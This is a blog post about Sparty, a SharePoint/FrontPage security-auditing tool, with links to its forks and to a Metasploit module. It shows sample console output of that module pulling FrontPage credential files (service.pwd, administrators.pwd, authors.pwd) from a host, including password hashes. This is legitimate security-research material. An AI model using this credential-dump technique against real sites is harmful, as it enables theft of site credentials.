Sparty : Useful Tools Die Hard !

Sparty was designed to conduct efficient security assessment of MS Sharepoint deployments. The tool has been used by security community which shows the acceptability and and highlighting that the tool is useful.

Sparty was presented at BlackHat 2013 and the presentation is available at: https://media.blackhat.com/us-13/Arsenal/us-13-Sood-Sparty-Slides.pdf

Overview

Sparty is an open source tool written in python to audit web applications using Sharepoint and frontpage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of Sharepoint and frontpage based web applications. Due to the complex nature of these web administration software, it is required to have a simple and efficient tool that gathers information, check access permissions, dump critical information from default files and perform automated exploitation if security risks are identified. A number of automated scanners fall short of this and Sparty is a solution to that.

The tool is hosted here: https://github.com/adityaks/sparty

Sparty has been enhanced by other researchers as well. Links are presented below.

https://github.com/0xdevalias/ added then support for “NTLM Authentication” which was good enhancement to test for authenticated Ms Sharepoint deployments.

More details here: https://blog.devalias.net/post/66844345127/sparty-sharepoint-frontpage-auditing-tool-now-with-more

Further, the Sparty source code has also been used to draft an “Auxiliary Scanner” Metasploit Framework for the vulnerability reported many years ago. Details are presented below:

Vulnerability: https://insecure.org/sploits/Microsoft.frontpage.insecurities.html

Metasploit Framework Module — https://github.com/rapid7/metasploit-framework/pull/10534/files

https://insecure.org/sploits/Microsoft.frontpage.insecurities.html

https://www.rapid7.com/db/modules/auxiliary/scanner/http/frontpage_credential_dump

The msf module works (referenced from: https://github.com/rapid7/metasploit-framework/pull/10534/files ) as shown below:

msf auxiliary(scanner/http/frontpage_credential_dump) > run[*] Requesting: /about/_vti_pvt/service.pwd

[*] Found /about/_vti_pvt/service.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 — service.pwd
[*] Requesting: /about/_vti_pvt/administrators.pwd
[*] Found /about/_vti_pvt/administrators.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 — administrators.pwd
[*] Requesting: /about/_vti_pvt/authors.pwd
[*] Found /about/_vti_pvt/authors.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 — authors.pwdFrontPage

Credentials

=====================
Source Username Password Hash
— — — — — — — — — — — — — —
Administrators e-scan.com xMyvw4d3c1oWY
Authors e-scan.com xMyvw4d3c1oWY
Service e-scan.com jLAsITPJ8AsaR

[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt

Rapid 7 has added the the auxillary scanner for “frontpage_credential_dump” considering the database entry as shown below:

Rapid 7: Auxiliary Scanner

Note: Thanks to all the researchers who further contributed to enhance the tool. Appreciate the fact that work has been credited as well.

Learn, Share and Enjoy !